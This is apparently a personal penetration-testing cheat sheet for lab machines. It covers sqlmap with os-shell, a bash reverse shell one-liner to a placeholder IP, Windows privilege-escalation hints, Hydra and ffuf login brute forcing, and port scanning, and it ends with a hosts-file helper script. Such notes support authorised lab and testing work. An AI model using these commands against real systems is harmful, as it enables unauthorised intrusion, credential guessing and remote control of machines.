My Pentest Tools
SQLMap (SQL injection tool)
To check whether a parameter is vulnerable to SQL injection, capture the request with Burp and save it to a file, then let sqlmap run its battery of test queries against that parameter.
sqlmap -r request -p search
-r: the request file containing the captured request
-p: the parameter we want to test for injection
--os-shell: add this option to spawn a shell if we can execute commands on the target machine
Then if we have a shell, just:
bash -c "bash -i >& /dev/tcp/{your_IP}/1234 0>&1"
Once we get a shell we notice that it is neither very interactive nor stable, so we can use python to upgrade it to a more reliable shell.
WinPEAS (Post-exploitation enumeration tool for Windows machines)
If we have the token permission SeImpersonatePrivilege, which is vulnerable to Juicy Potato, we may be able to escalate privileges.
If we have a normal user account as well as a service account, it is worth checking for frequently accessed files or executed commands. To do that, we read the PowerShell history file, which is the equivalent of .bash_history on Linux systems. The file ConsoleHost_history.txt is located in the directory C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\.
Hydra (Brute Force Login)
hydra -l <user> -P <pass_wordlist> <target> <method> "<endpoint>:username=^USER^&password=^PASS^&Login=Login:Login Failed"
-l: specify the username
-L: specify a list of usernames
-P: specify a list of passwords
target: target domain or IP
method: the attack module (most of the time http-post-form)
"<Path>:<RequestBody>:<PassList>": Path is the endpoint of the request, RequestBody contains the username and password fields, and PassList is a string that identifies the failed-login page (in the example above, "Login Failed"), so hydra can tell a valid attempt from an invalid one.
To brute force the user, replace the username value with ^USER^
To brute force the password, replace the password value with ^PASS^
ffuf (Brute force APIs and parameters)
Capture the request of a failed login with Burp
Replace the password and/or username fields with an identifier such as ^FUZZPASS^ (the identifier must match the keyword given after the colon in -w, e.g. PASSFUZZ in the command below)
Right-click -> Copy to file
ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200
-request: the request file we saved
-request-proto: the protocol to use (http or https)
-mode: the fuzzing mode; clusterbomb (every combination of the wordlists) is the default
-w: the wordlist for each identifier, written as <file>:<KEYWORD>
-mc: the HTTP status code(s) to match, so only responses with that code are shown
Bash tricks
Set the IP of the target machine as an environment variable:
export IP=<Ip_here>
Rustscan (Scan Ports)
Scan all ports with default scripts (rustscan takes the target with -a):
rustscan -a <host> --range 1-65535 --scripts default
NMAP (Information about ports)
List the ports with information:
nmap -sT -p <port_list> -Pn -sV <host>
Linux Tricks
Hosts
On opening Firefox and entering http://[target ip], the browser returns a message about being unable to find that site. Looking in the URL bar, it now shows http://unika.htb. The website has redirected the browser to a new URL, and your host doesn't know how to find unika.htb. This webserver is employing name-based virtual hosting to serve the requests.
Name-based virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname. The web server checks the domain name provided in the Host header field of the HTTP request and sends a response according to that.
The /etc/hosts file is used to resolve a hostname into an IP address, and thus we will need to add an entry in /etc/hosts for this domain to enable the browser to resolve the address for unika.htb.
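As an added example (not from the original notes), a small shell helper that performs the /etc/hosts step above idempotently, replacing a stale mapping left over from an earlier target instead of appending a duplicate, plus a curl check that shows the Host header is what the virtual host keys on. The IP 10.129.95.234 and the temp-file contents are constructed sample data; the helper writes to a file you pass in, so nothing touches the real /etc/hosts unless you ask it to.

```shell
#!/usr/bin/env bash
# host_lookup HOSTNAME [HOSTS_FILE]: print the IP mapped to HOSTNAME, or nothing.
host_lookup() {
    local name="$1" file="${2:-/etc/hosts}"
    # Skip comment lines, then match the name against every hostname on a line.
    awk -v n="$name" '!/^[[:space:]]*#/ { for (i = 2; i <= NF; i++) if ($i == n) { print $1; exit } }' "$file"
}

# add_host_entry IP HOSTNAME [HOSTS_FILE]: map HOSTNAME to IP exactly once.
# A name already mapped to a different IP (e.g. a previous lab box) is replaced,
# otherwise the stale line would keep winning and traffic would go to the wrong host.
add_host_entry() {
    local ip="$1" name="$2" file="${3:-/etc/hosts}" current
    # Only accept a dotted-quad; refuse anything else before touching the file.
    case "$ip" in
        ""|*[!0-9.]*) echo "add_host_entry: bad ip '$ip'" >&2; return 1 ;;
    esac
    current=$(host_lookup "$name" "$file")
    [ "$current" = "$ip" ] && return 0          # already correct, nothing to do
    if [ -n "$current" ]; then
        # Remove the stale mapping; '|| true' keeps set -e happy if no line is left.
        grep -vE "[[:space:]]$name([[:space:]]|\$)" "$file" > "$file.tmp" || true
        mv "$file.tmp" "$file"
    fi
    printf '%s\t%s\n' "$ip" "$name" >> "$file"
}

# vhost_check IP HOSTNAME: request the bare IP, then the same IP with the Host
# header set. A different status or redirect target is the name-based vhost at work.
vhost_check() {
    local ip="$1" name="$2"
    echo "Host: $ip";   curl -s -o /dev/null -w '%{http_code} %{redirect_url}\n' "http://$ip/"
    echo "Host: $name"; curl -s -o /dev/null -w '%{http_code} %{redirect_url}\n' -H "Host: $name" "http://$ip/"
}

# Constructed demo against a temporary file (never the real /etc/hosts).
demo() {
    local tmp; tmp=$(mktemp)
    printf '127.0.0.1\tlocalhost\n# 10.0.0.1\tunika.htb\n10.10.10.5\tunika.htb\n' > "$tmp"
    add_host_entry 10.129.95.234 unika.htb "$tmp"    # replaces the stale 10.10.10.5 line
    host_lookup unika.htb "$tmp"                     # -> 10.129.95.234
    rm -f "$tmp"
}
```

Run `demo` to see the replacement on the sample file, or `add_host_entry 10.129.95.234 unika.htb` (as root) followed by `vhost_check 10.129.95.234 unika.htb` against a live target.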